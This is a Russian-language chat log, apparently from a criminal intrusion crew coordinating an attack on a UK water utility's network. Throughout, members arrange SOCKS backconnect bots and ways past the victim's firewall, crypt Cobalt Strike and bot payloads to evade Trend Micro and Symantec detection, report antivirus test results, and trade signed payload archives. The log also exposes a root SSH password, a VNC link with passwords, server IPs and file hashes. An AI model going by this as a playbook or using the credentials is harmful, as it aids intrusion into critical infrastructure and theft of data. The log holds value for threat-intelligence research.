[2023-12-23 20:48:12] @usernamegg:matrix.bestflowers247.online: где есть место ?
--------------------
[2023-12-23 20:48:14] @usernamegg:matrix.bestflowers247.online: пускай сам сделает
--------------------
[2023-12-23 20:48:20] @usernamegg:matrix.bestflowers247.online: мы мне как то дату заливал несколько дней
--------------------
[2023-12-23 20:48:23] @usernamegg:matrix.bestflowers247.online: и то не залил
--------------------
[2023-12-23 20:48:27] @usernameyy:matrix.bestflowers247.online: есть 2 тб ~ а у него он говорил одна сетка 3 тб
--------------------
[2023-12-23 20:48:40] @usernameyy:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> мы мне как то дату заливал несколько дней

я?
--------------------
[2023-12-23 20:49:35] @usernamegg:matrix.bestflowers247.online: да
--------------------
[2023-12-23 20:49:45] @usernamegg:matrix.bestflowers247.online: сейчас 2тб еще нашли
--------------------
[2023-12-23 20:49:49] @usernameyy:matrix.bestflowers247.online: не помню чтоб я так косячил)
--------------------
[2023-12-23 20:49:50] @usernamegg:matrix.bestflowers247.online: какую удалить
--------------------
[2023-12-23 20:50:24] @usernameyy:matrix.bestflowers247.online: 9_2 самый старый сейчас, выбирайте там что нибудь
--------------------
[2023-12-23 20:51:29] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2023-12-23 20:52:04] @usernameyy:matrix.bestflowers247.online: наш хостер в сети с прокладками для абхазии?
--------------------
[2023-12-23 20:52:10] @usernameyy:matrix.bestflowers247.online: он надежный, мб у него в наличии есть что то
--------------------
[2023-12-23 20:52:22] @usernamegg:matrix.bestflowers247.online: ща
--------------------
[2023-12-23 20:52:24] @usernamegg:matrix.bestflowers247.online: фтп ?
--------------------
[2023-12-23 20:52:27] @usernameyy:matrix.bestflowers247.online: да
--------------------
[2023-12-23 20:52:45] @usernameyy:matrix.bestflowers247.online: 178.236.246.138 вот один из его айпи
--------------------
[2023-12-23 20:52:47] @usernamegg:matrix.bestflowers247.online: лучше абхазию брать
--------------------
[2023-12-23 20:52:53] @usernamegg:matrix.bestflowers247.online: в одном месте для блога
--------------------
[2023-12-23 20:53:02] @usernamegg:matrix.bestflowers247.online: а для осного фтп в другом
--------------------
[2023-12-23 20:53:07] @usernamegg:matrix.bestflowers247.online: прокладки можно у него же
--------------------
[2023-12-23 20:53:07] @usernameyy:matrix.bestflowers247.online: временно, чтоб блог не удалять
--------------------
[2023-12-23 20:54:42] @usernamegg:matrix.bestflowers247.online: сейчас
--------------------
[2023-12-23 21:03:44] @usernamegg:matrix.bestflowers247.online: короче с этой сетко круто все
--------------------
[2023-12-23 21:03:47] @usernamegg:matrix.bestflowers247.online: соксы не поднять
--------------------
[2023-12-23 21:03:53] @usernamegg:matrix.bestflowers247.online: ты поднимал сетки
--------------------
[2023-12-23 21:05:06] @usernamegg:matrix.bestflowers247.online: southernwater.co.uk
--------------------
[2023-12-23 21:05:13] @cameron777:matrix.org: sec
--------------------
[2023-12-23 21:06:54] @usernamegg:matrix.bestflowers247.online: скинь в общий чат если есть
--------------------
[2023-12-23 21:06:57] @usernamegg:matrix.bestflowers247.online: очень нужны соксы
--------------------
[2023-12-23 21:07:29] @cameron777:matrix.org: shas proveryu chto to ne robotaet
--------------------
[2023-12-23 21:08:33] @usernamegg:matrix.bestflowers247.online: и не работала
--------------------
[2023-12-23 21:08:41] @usernamegg:matrix.bestflowers247.online: мы пинго неделю качали данные у них
--------------------
[2023-12-23 21:11:30] @cameron777:matrix.org: 13.57.243.97:19344
--------------------
[2023-12-23 21:11:34] @cameron777:matrix.org: socks vrode ok
--------------------
[2023-12-23 21:13:07] @cameron777:matrix.org: otrubaet chto to
--------------------
[2023-12-23 21:13:37] @usernamegg:matrix.bestflowers247.online: была попопытка зайти по рдп на тачку
--------------------
[2023-12-23 21:13:43] @usernamegg:matrix.bestflowers247.online: и сразу у тебя рубануло его
--------------------
[2023-12-23 21:16:46] @cameron777:matrix.org: kakei to byte-i prixodyat
officeclicktorun.exe (System) - self.events.data.microsoft.com:443 close, 643 bytes sent, 99 bytes received, lifetime <1 sec
--------------------
[2023-12-23 21:17:41] @cameron777:matrix.org: shas pereotkril posmotrim
--------------------
[2023-12-23 21:20:24] @cameron777:matrix.org: shas probnu smenit' IP BackConnect-a na UK IP
--------------------
[2023-12-23 21:21:17] @usernamegg:matrix.bestflowers247.online: нет не шутка
--------------------
[2023-12-23 21:21:31] @usernamegg:matrix.bestflowers247.online: ты можешь дать свою длл для того что бы мы по всей сети прослали ?
--------------------
[2023-12-23 21:22:21] @usernamegg:matrix.bestflowers247.online: тут ?
--------------------
[2023-12-23 21:22:25] @usernamegg:matrix.bestflowers247.online: криптанем сокс бота
--------------------
[2023-12-23 21:22:25] @usernamegg:matrix.bestflowers247.online: ?
--------------------
[2023-12-23 21:22:32] @usernamegg:matrix.bestflowers247.online: тенмикро надо обойти
--------------------
[2023-12-23 21:25:10] @usernamess:matrix.bestflowers247.online: 213_443.exe
--------------------
[2023-12-23 21:25:11] @usernamess:matrix.bestflowers247.online: 213_80.exe
--------------------
[2023-12-23 21:25:11] @usernamess:matrix.bestflowers247.online: 213_8080.exe
--------------------
[2023-12-23 21:25:11] @usernamess:matrix.bestflowers247.online: 202_8080.exe
--------------------
[2023-12-23 21:25:12] @usernamess:matrix.bestflowers247.online: 202_80.exe
--------------------
[2023-12-23 21:25:25] @usernamess:matrix.bestflowers247.online: burrito: тут?
--------------------
[2023-12-23 21:25:38] @usernamess:matrix.bestflowers247.online: 213_443.exe
--------------------
[2023-12-23 21:25:38] @usernamess:matrix.bestflowers247.online: 213_80.exe
--------------------
[2023-12-23 21:25:38] @usernamess:matrix.bestflowers247.online: 213_8080.exe
--------------------
[2023-12-23 21:25:39] @usernamess:matrix.bestflowers247.online: 202_8080.exe
--------------------
[2023-12-23 21:25:39] @usernamess:matrix.bestflowers247.online: 202_80.exe
--------------------
[2023-12-23 21:25:55] @usernamess:matrix.bestflowers247.online: 202_443.exe
--------------------
[2023-12-23 21:28:25] @cob_crypt_ward:matrix.bestflowers247.online: мою dll?
--------------------
[2023-12-23 21:28:28] @cob_crypt_ward:matrix.bestflowers247.online: не понял немного
--------------------
[2023-12-23 21:29:02] @cob_crypt_ward:matrix.bestflowers247.online: на мой сервер которая будет?
--------------------
[2023-12-23 21:29:21] @usernamegg:matrix.bestflowers247.online: короче
--------------------
[2023-12-23 21:29:30] @usernamegg:matrix.bestflowers247.online: там сам проток заблочен
--------------------
[2023-12-23 21:29:33] @usernamegg:matrix.bestflowers247.online: смотри
--------------------
[2023-12-23 21:29:37] @cameron777:matrix.org: shas paru minut
--------------------
[2023-12-23 21:29:39] @cameron777:matrix.org: na novom posmotrim
--------------------
[2023-12-23 21:29:40] @usernamegg:matrix.bestflowers247.online: если мы сейчас дадим тебе цитрикс
--------------------
[2023-12-23 21:29:48] @usernamegg:matrix.bestflowers247.online: ты сможешь зайти в фаервол
--------------------
[2023-12-23 21:30:01] @usernamegg:matrix.bestflowers247.online: и найти какой проток заблочен на передачу данных ?
--------------------
[2023-12-23 21:30:07] @usernamegg:matrix.bestflowers247.online: что бы его заблокировать и запустить сокс
--------------------
[2023-12-23 21:30:16] @usernamegg:matrix.bestflowers247.online: ты же знаешь какой проток для этого используют
--------------------
[2023-12-23 21:30:19] @usernamegg:matrix.bestflowers247.online: ты же написал сокс бота
--------------------
[2023-12-23 21:30:37] @usernameyy:matrix.bestflowers247.online: возможно) никогда не видел цитрикс
--------------------
[2023-12-23 21:30:42] @usernameyy:matrix.bestflowers247.online: попробовать можно
--------------------
[2023-12-23 21:31:49] @usernamegg:matrix.bestflowers247.online: давай цитрикс
--------------------
[2023-12-23 21:31:52] @usernamegg:matrix.bestflowers247.online: по ним
--------------------
[2023-12-23 21:31:59] @usernamegg:matrix.bestflowers247.online: поднимай открывай в рдп
--------------------
[2023-12-23 21:32:02] @usernamegg:matrix.bestflowers247.online: я зайду
--------------------
[2023-12-23 21:32:07] @cameron777:matrix.org: shas netu ix online
--------------------
[2023-12-23 21:32:08] @usernamegg:matrix.bestflowers247.online: там протокол блочит общения
--------------------
[2023-12-23 21:32:14] @cameron777:matrix.org: esli est' dostupi
--------------------
[2023-12-23 21:32:15] @usernamegg:matrix.bestflowers247.online: блин
--------------------
[2023-12-23 21:32:17] @cameron777:matrix.org: mozhno probnut'
--------------------
[2023-12-23 21:32:29] @cameron777:matrix.org: paru min shas uzanem
--------------------
[2023-12-23 21:32:37] @usernamegg:matrix.bestflowers247.online: именно протокол который отвечает за общение по сети
--------------------
[2023-12-23 21:32:41] @usernamegg:matrix.bestflowers247.online: сокса
--------------------
[2023-12-23 21:32:50] @usernamegg:matrix.bestflowers247.online: там надо заходить и смотреть настройки фаервола
--------------------
[2023-12-23 21:33:01] @cameron777:matrix.org: nu po https robotaet zhe
--------------------
[2023-12-23 21:34:39] @usernamegg:matrix.bestflowers247.online: http не рабоатет
--------------------
[2023-12-23 21:34:51] @usernamegg:matrix.bestflowers247.online: так
--------------------
[2023-12-23 21:34:51] @usernamegg:matrix.bestflowers247.online: стой
--------------------
[2023-12-23 21:35:09] @usernamegg:matrix.bestflowers247.online: точно работает https ?
--------------------
[2023-12-23 21:35:20] @usernamett:matrix.bestflowers247.online: ```
-----------------------------------------
proxychains ssh root@49.13.66.250 = anabes.com
SSH Password: 	baC9dnWj5Gy4iRuqJhvPepU
-----------------------------------------
```
--------------------
[2023-12-23 21:35:21] @burito:matrix.bestflowers247.online: тут, щас
--------------------
[2023-12-23 21:35:26] @usernamegg:matrix.bestflowers247.online: поднимешь свой сокс бот на https ?
--------------------
[2023-12-23 21:35:33] @usernamegg:matrix.bestflowers247.online: с доменом
--------------------
[2023-12-23 21:35:38] @usernamegg:matrix.bestflowers247.online: кажись там работает https
--------------------
[2023-12-23 21:35:51] @usernamegg:matrix.bestflowers247.online: сокс бота надо криптануть
--------------------
[2023-12-23 21:35:54] @burito:matrix.bestflowers247.online: щас
--------------------
[2023-12-23 21:36:01] @usernamegg:matrix.bestflowers247.online: ```
-----------------------------------------
proxychains ssh root@49.13.66.250 = anabes.com
SSH Password: 	baC9dnWj5Gy4iRuqJhvPepU
-----------------------------------------
```
--------------------
[2023-12-23 21:36:02] @burito:matrix.bestflowers247.online: вижу
--------------------
[2023-12-23 21:36:20] @usernameyy:matrix.bestflowers247.online: только если не свой, https совсем другой протокол чем socks5
--------------------
[2023-12-23 21:36:48] @usernamegg:matrix.bestflowers247.online: что бы он стучал по https нельзя ?
--------------------
[2023-12-23 21:36:57] @usernamegg:matrix.bestflowers247.online: на домен же там он стучит
--------------------
[2023-12-23 21:37:05] @usernameyy:matrix.bestflowers247.online: нет, это разные протоколы
--------------------
[2023-12-23 21:37:05] @usernamegg:matrix.bestflowers247.online: общение что бы происходило по https
--------------------
[2023-12-23 21:37:39] @usernamegg:matrix.bestflowers247.online: блин я думал можно привязать домен сделать серт https и поднять сокс что бы общался по https
--------------------
[2023-12-23 21:37:53] @usernamegg:matrix.bestflowers247.online: тогда пойдешь смотреть на рдп фаервол
--------------------
[2023-12-23 21:38:18] @usernamegg:matrix.bestflowers247.online: я просто не знаю как там он натроен так что протокол именно общешия сокса рубит после превого конекта
--------------------
[2023-12-23 21:38:25] @usernameyy:matrix.bestflowers247.online: давай давай
--------------------
[2023-12-23 21:38:27] @usernamegg:matrix.bestflowers247.online: так же с выкачкой было
--------------------
[2023-12-23 21:38:49] @usernamegg:matrix.bestflowers247.online: https и протокол сокс бота это разные вещи
--------------------
[2023-12-23 21:38:59] @usernamegg:matrix.bestflowers247.online: мне надо цитрикс что бы ты открыл на впске
--------------------
[2023-12-23 21:39:17] @usernamegg:matrix.bestflowers247.online: ты тут ?
--------------------
[2023-12-23 21:39:28] @cameron777:matrix.org: > <@usernamegg:matrix.bestflowers247.online> https и протокол сокс бота это разные вещи

tam po drugomu ustroeno
--------------------
[2023-12-23 21:39:31] @cameron777:matrix.org: shifrovanno vse
--------------------
[2023-12-23 21:39:44] @cameron777:matrix.org: ne vidno socksa
--------------------
[2023-12-23 21:39:52] @cameron777:matrix.org: vozmozhno domena netu k IPu potomu tak
--------------------
[2023-12-23 21:40:20] @cameron777:matrix.org: shas uzanem paru min shas pust' podklychaetsya
--------------------
[2023-12-23 21:41:01] @usernameyy:matrix.bestflowers247.online: ну если не получится надо будет пробовать пинг прокси, но это еще день работы
--------------------
[2023-12-23 21:41:08] @usernameyy:matrix.bestflowers247.online: быстро не сделаю
--------------------
[2023-12-23 21:41:27] @usernamegg:matrix.bestflowers247.online: ссылку на цитрикс туда дай
--------------------
[2023-12-23 21:41:37] @usernamegg:matrix.bestflowers247.online: мы зайдем сами
--------------------
[2023-12-23 21:41:42] @usernamegg:matrix.bestflowers247.online: у нас есть же креды
--------------------
[2023-12-23 21:42:02] @usernamegg:matrix.bestflowers247.online: надо фаервол натсроить нормально
--------------------
[2023-12-23 21:42:21] @usernamegg:matrix.bestflowers247.online: +
--------------------
[2023-12-23 21:43:36] @cob_crypt_ward:matrix.bestflowers247.online: если ты про крипт, какой там EDR?
--------------------
[2023-12-23 21:43:50] @cob_crypt_ward:matrix.bestflowers247.online: жду твоего ответа
--------------------
[2023-12-23 21:43:58] @usernamegg:matrix.bestflowers247.online: трендмикро и симонтек
--------------------
[2023-12-23 21:44:05] @cameron777:matrix.org: sha naydu
--------------------
[2023-12-23 21:44:10] @usernamegg:matrix.bestflowers247.online: все самое лучшее )
--------------------
[2023-12-23 21:44:14] @usernamegg:matrix.bestflowers247.online: чуть позже возможно надо будет
--------------------
[2023-12-23 21:44:17] @cameron777:matrix.org: k IP chto to rezhet'
--------------------
[2023-12-23 21:44:23] @cob_crypt_ward:matrix.bestflowers247.online: если спалимся, все умрет?
--------------------
[2023-12-23 21:44:23] @cameron777:matrix.org: k domenu OK vse
--------------------
[2023-12-23 21:44:27] @cob_crypt_ward:matrix.bestflowers247.online: или доступ останется?
--------------------
[2023-12-23 21:44:54] @cob_crypt_ward:matrix.bestflowers247.online: билд с boku давай сделаем, прогонем по win10+, а для остальных с elusvie
--------------------
[2023-12-23 21:44:59] @cob_crypt_ward:matrix.bestflowers247.online: на trendmicro boku нужен
--------------------
[2023-12-23 21:45:10] @cameron777:matrix.org: sec
--------------------
[2023-12-23 21:45:22] @cob_crypt_ward:matrix.bestflowers247.online: я пока трендмикро вм поковыряю, попробую пасс востановить
--------------------
[2023-12-23 21:45:28] @usernamegg:matrix.bestflowers247.online: у тебя была только одна машина где работал https ?
--------------------
[2023-12-23 21:45:31] @usernamegg:matrix.bestflowers247.online: ой не тебе
--------------------
[2023-12-23 21:45:35] @cameron777:matrix.org: vot otkrilos shell
--------------------
[2023-12-23 21:45:37] @cameron777:matrix.org: no opyat'
--------------------
[2023-12-23 21:45:38] @burito:matrix.bestflowers247.online: 213_443.ex
--------------------
[2023-12-23 21:45:38] @usernamegg:matrix.bestflowers247.online: у тебя была только одна машина где работал https ?

--------------------
[2023-12-23 21:45:40] @cameron777:matrix.org: rezhet
--------------------
[2023-12-23 21:45:47] @burito:matrix.bestflowers247.online: > <@usernamess:matrix.bestflowers247.online> 213_443.exe

по одному пробуй
--------------------
[2023-12-23 21:45:51] @cob_crypt_ward:matrix.bestflowers247.online: сижу тут, жду билды с elusive и boku
--------------------
[2023-12-23 21:45:56] @cob_crypt_ward:matrix.bestflowers247.online: но не знаю сколько еще тут буду
--------------------
[2023-12-23 21:46:05] @cob_crypt_ward:matrix.bestflowers247.online: я отойду вм попробовать настроить \
--------------------
[2023-12-23 21:46:06] @cameron777:matrix.org: dazhe uspel skinu cobu
--------------------
[2023-12-23 21:46:11] @cameron777:matrix.org: * dazhe uspel skinut' cobu
--------------------
[2023-12-23 21:46:18] @cameron777:matrix.org: kIPu rezhet nado domen
--------------------
[2023-12-23 21:46:22] @usernamegg:matrix.bestflowers247.online: трендмикро и симонтек делает свое дело и аухенно настроенный фаер
--------------------
[2023-12-23 21:46:25] @cameron777:matrix.org: * k IPu rezhet nado domen
--------------------
[2023-12-23 21:46:39] @cameron777:matrix.org: eto firewall
--------------------
[2023-12-23 21:46:46] @cameron777:matrix.org: nado domen
--------------------
[2023-12-23 21:46:47] @cameron777:matrix.org: shas posmotryu
--------------------
[2023-12-23 21:46:53] @cameron777:matrix.org: mozhet zarobotaet s domenom
--------------------
[2023-12-23 21:46:57] @cameron777:matrix.org: privyazhu domen
--------------------
[2023-12-23 21:48:54] @cameron777:matrix.org: oni znayut chto kobi uzayut IPi
--------------------
[2023-12-23 21:48:57] @cameron777:matrix.org: i  ne puskaet
--------------------
[2023-12-23 21:49:03] @cameron777:matrix.org: voobshe
--------------------
[2023-12-23 21:50:45] @usernamegg:matrix.bestflowers247.online: http://temp.sh/Yvapa/client.bin
--------------------
[2023-12-23 21:54:30] @burito:matrix.bestflowers247.online: все сделаю и скину, подписать надо ж
--------------------
[2023-12-23 21:54:48] @cameron777:matrix.org: a net v BC nelzya ukazat' domen
shas koder pridyot sproshu ego
pust' peredelaet
--------------------
[2023-12-23 21:55:33] @usernamegg:matrix.bestflowers247.online: https://file.io/X2yDrGkfziao
--------------------
[2023-12-23 21:55:40] @usernamegg:matrix.bestflowers247.online: тут внц
--------------------
[2023-12-23 21:55:43] @usernamegg:matrix.bestflowers247.online: бурито
--------------------
[2023-12-23 21:55:48] @usernamegg:matrix.bestflowers247.online: скачай
--------------------
[2023-12-23 21:56:21] @cameron777:matrix.org: u vas IP i tolko
--------------------
[2023-12-23 21:56:25] @cameron777:matrix.org: * u vas IP i tolko?
--------------------
[2023-12-23 21:56:27] @cameron777:matrix.org: kobi
--------------------
[2023-12-23 21:56:30] @cameron777:matrix.org: na IPi stuchat?
--------------------
[2023-12-23 21:56:36] @cameron777:matrix.org: zdelayete na domen
--------------------
[2023-12-23 21:56:49] @cameron777:matrix.org: i stuknet
--------------------
[2023-12-23 21:56:50] @usernamegg:matrix.bestflowers247.online: сокс бот стучит по другому протоколу
--------------------
[2023-12-23 21:56:55] @usernamegg:matrix.bestflowers247.online: он не работает по https
--------------------
[2023-12-23 21:57:30] @cameron777:matrix.org: nu ya ponimayu eto vse
no tam firewall blochit imenno to chto k IPu ti xochesh konkekti delat'
--------------------
[2023-12-23 21:57:34] @burito:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> https://file.io/X2yDrGkfziao

это криптануть и длл и ехе?
--------------------
[2023-12-23 21:57:41] @cameron777:matrix.org: DNS ne srabativaet u nix i blochit vse
--------------------
[2023-12-23 21:57:57] @usernamegg:matrix.bestflowers247.online: https://178.208.87.185:8101/?pass=1A880E34:158DD9C5&pass_vnc=xdmNFTQO
--------------------
[2023-12-23 21:58:33] @cameron777:matrix.org: ya k tomu mozhon s domenom probnut'

--------------------
[2023-12-23 21:58:45] @cameron777:matrix.org: esli u vas est' takaya vozmozhnost'
poka zhdu chtob otpisal koder
--------------------
[2023-12-23 21:58:55] @cameron777:matrix.org: shas posmotryu link na citrix
--------------------
[2023-12-23 21:59:10] @usernamegg:matrix.bestflowers247.online: погоди
--------------------
[2023-12-23 21:59:28] @usernamegg:matrix.bestflowers247.online: сервер внц работает ?
--------------------
[2023-12-23 22:00:15] @cameron777:matrix.org: tam vpn mozhno podnyat' no k domenu chtob stuchalo
--------------------
[2023-12-23 22:06:08] @usernamegg:matrix.bestflowers247.online: мне надо фаервола дойти
--------------------
[2023-12-23 22:06:13] @usernamegg:matrix.bestflowers247.online: я там все сам сделаю
--------------------
[2023-12-23 22:06:38] @usernamegg:matrix.bestflowers247.online: из цитрикса я пройду до туда куда надо
--------------------
[2023-12-23 22:07:14] @cameron777:matrix.org: ya shas ishu login stranicu no tam vozmozhno budet 2fa
--------------------
[2023-12-23 22:07:44] @usernamegg:matrix.bestflowers247.online: да это теория $$
--------------------
[2023-12-23 22:07:46] @usernamegg:matrix.bestflowers247.online: я в нее не очень верю
--------------------
[2023-12-23 22:07:52] @usernamegg:matrix.bestflowers247.online: пробовать надо
--------------------
[2023-12-23 22:07:56] @cameron777:matrix.org: uhu
--------------------
[2023-12-23 22:07:57] @cameron777:matrix.org: shas ishu
--------------------
[2023-12-23 22:08:13] @usernamegg:matrix.bestflowers247.online: ++
--------------------
[2023-12-23 22:08:21] @usernamegg:matrix.bestflowers247.online: мне тут до фаервола нужно дойти
--------------------
[2023-12-23 22:08:22] @burito:matrix.bestflowers247.online: signed_CA8DD78C6.7z
--------------------
[2023-12-23 22:08:31] @usernamegg:matrix.bestflowers247.online: поднима сокс после первого конекта отвал
--------------------
[2023-12-23 22:08:37] @burito:matrix.bestflowers247.online: > <@usernamess:matrix.bestflowers247.online> burrito: тут?

проверь
--------------------
[2023-12-23 22:08:39] @usernamegg:matrix.bestflowers247.online: что за настройка там лютая стоит на проток общения
--------------------
[2023-12-23 22:08:41] @cameron777:matrix.org: https://gw.swconnect.co.uk
--------------------
[2023-12-23 22:09:06] @cameron777:matrix.org: ono)
--------------------
[2023-12-23 22:09:14] @cameron777:matrix.org: esli nado
--------------------
[2023-12-23 22:09:16] @cameron777:matrix.org: zhdi
--------------------
[2023-12-23 22:09:20] @cameron777:matrix.org: poka zaydu na citrix i dam
--------------------
[2023-12-23 22:10:57] @cameron777:matrix.org: prosto shas robotnikov netu
--------------------
[2023-12-23 22:28:00] @cameron777:matrix.org: hyunadi vse ? udalayu vse fayli ?
--------------------
[2023-12-23 22:31:22] @cob_crypt_ward:matrix.bestflowers247.online: я протеститл свои билды
--------------------
[2023-12-23 22:31:38] @cob_crypt_ward:matrix.bestflowers247.online: результаты хорошие, но не отличные
--------------------
[2023-12-23 22:31:56] @cob_crypt_ward:matrix.bestflowers247.online: софос\форти\что-то еще - ок
--------------------
[2023-12-23 22:32:56] @cob_crypt_ward:matrix.bestflowers247.online: checkpoint harmony - не запустился, пока что не знаю почему
--------------------
[2023-12-23 22:32:57] @cob_crypt_ward:matrix.bestflowers247.online: cylance - детект с боку и без
--------------------
[2023-12-23 22:33:18] @cob_crypt_ward:matrix.bestflowers247.online: * cylance - детект с боку и без в динамике
--------------------
[2023-12-23 22:33:28] @cob_crypt_ward:matrix.bestflowers247.online: * софос\\форти\\тренд еще - ок
--------------------
[2023-12-23 22:34:38] @usernameyy:matrix.bestflowers247.online: я щас усну)
--------------------
[2023-12-23 22:34:47] @usernameyy:matrix.bestflowers247.online: будет цитрикс?
--------------------
[2023-12-23 22:35:05] @cob_crypt_ward:matrix.bestflowers247.online: trend.jpg
--------------------
[2023-12-23 22:35:12] @cob_crypt_ward:matrix.bestflowers247.online: sofos.jpg
--------------------
[2023-12-23 22:35:19] @cob_crypt_ward:matrix.bestflowers247.online: остальные не фоткал
--------------------
[2023-12-23 22:36:27] @usernameww:matrix.bestflowers247.online: 005a05d5-b293-4a40-8cc1-9e4360e54a71  SWS  продлить этот хэш! он старый ставим сегодня
--------------------
[2023-12-23 23:08:24] @usernamegg:matrix.bestflowers247.online: это коба ?
--------------------
[2023-12-23 23:11:12] @usernamegg:matrix.bestflowers247.online: ты тут ?
--------------------
[2023-12-23 23:11:30] @usernamegg:matrix.bestflowers247.online: удаляй хендай да
--------------------
[2023-12-23 23:12:08] @usernamegg:matrix.bestflowers247.online: https://gw.swconnect.co.uk
--------------------
[2023-12-23 23:12:15] @cameron777:matrix.org: ok
--------------------
[2023-12-23 23:12:46] @cameron777:matrix.org: po citrixu water nado zhdat' kak zaydut dam znat'

--------------------
[2023-12-23 23:20:33] @usernamegg:matrix.bestflowers247.online: да
--------------------
[2023-12-23 23:20:34] @usernamegg:matrix.bestflowers247.online: ок
--------------------
[2023-12-23 23:20:34] @usernamegg:matrix.bestflowers247.online: ждем
--------------------
[2023-12-23 23:20:38] @usernamegg:matrix.bestflowers247.online: пока ковряем
--------------------
[2023-12-23 23:20:43] @cameron777:matrix.org: ok
--------------------
[2023-12-23 23:25:32] @usernamegg:matrix.bestflowers247.online: позже
--------------------
[2023-12-23 23:29:21] @usernamess:matrix.bestflowers247.online: 901780fe26f5e588cf38817852f67b37
--------------------
[2023-12-23 23:36:21] @usernamess:matrix.bestflowers247.online: `276cfefca226f065b50d70469549c8e2`
--------------------
[2023-12-23 23:37:04] @usernamess:matrix.bestflowers247.online: 15e9bf2fb5bf64a3e6b0dad625250e0e
--------------------
[2023-12-23 23:39:16] @usernamess:matrix.bestflowers247.online: 5d4d4373d9ff9e99a7e89b2b4e7713d2
--------------------
[2023-12-23 23:40:49] @usernamecc:matrix.bestflowers247.online: ictower.com | hamon.com
--------------------
[2023-12-23 23:41:06] @usernamecc:matrix.bestflowers247.online: wilbarintl.com
--------------------
[2023-12-23 23:46:49] @burito:matrix.bestflowers247.online: > <@usernamegg:matrix.bestflowers247.online> https://file.io/X2yDrGkfziao

exeшка, дллка без экспортной функции, хз как ее сдеать
--------------------
[2023-12-23 23:46:49] @burito:matrix.bestflowers247.online: signed_7CCBBCD46.7z
--------------------
[2023-12-23 23:52:41] @usernamegg:matrix.bestflowers247.online: ++
--------------------
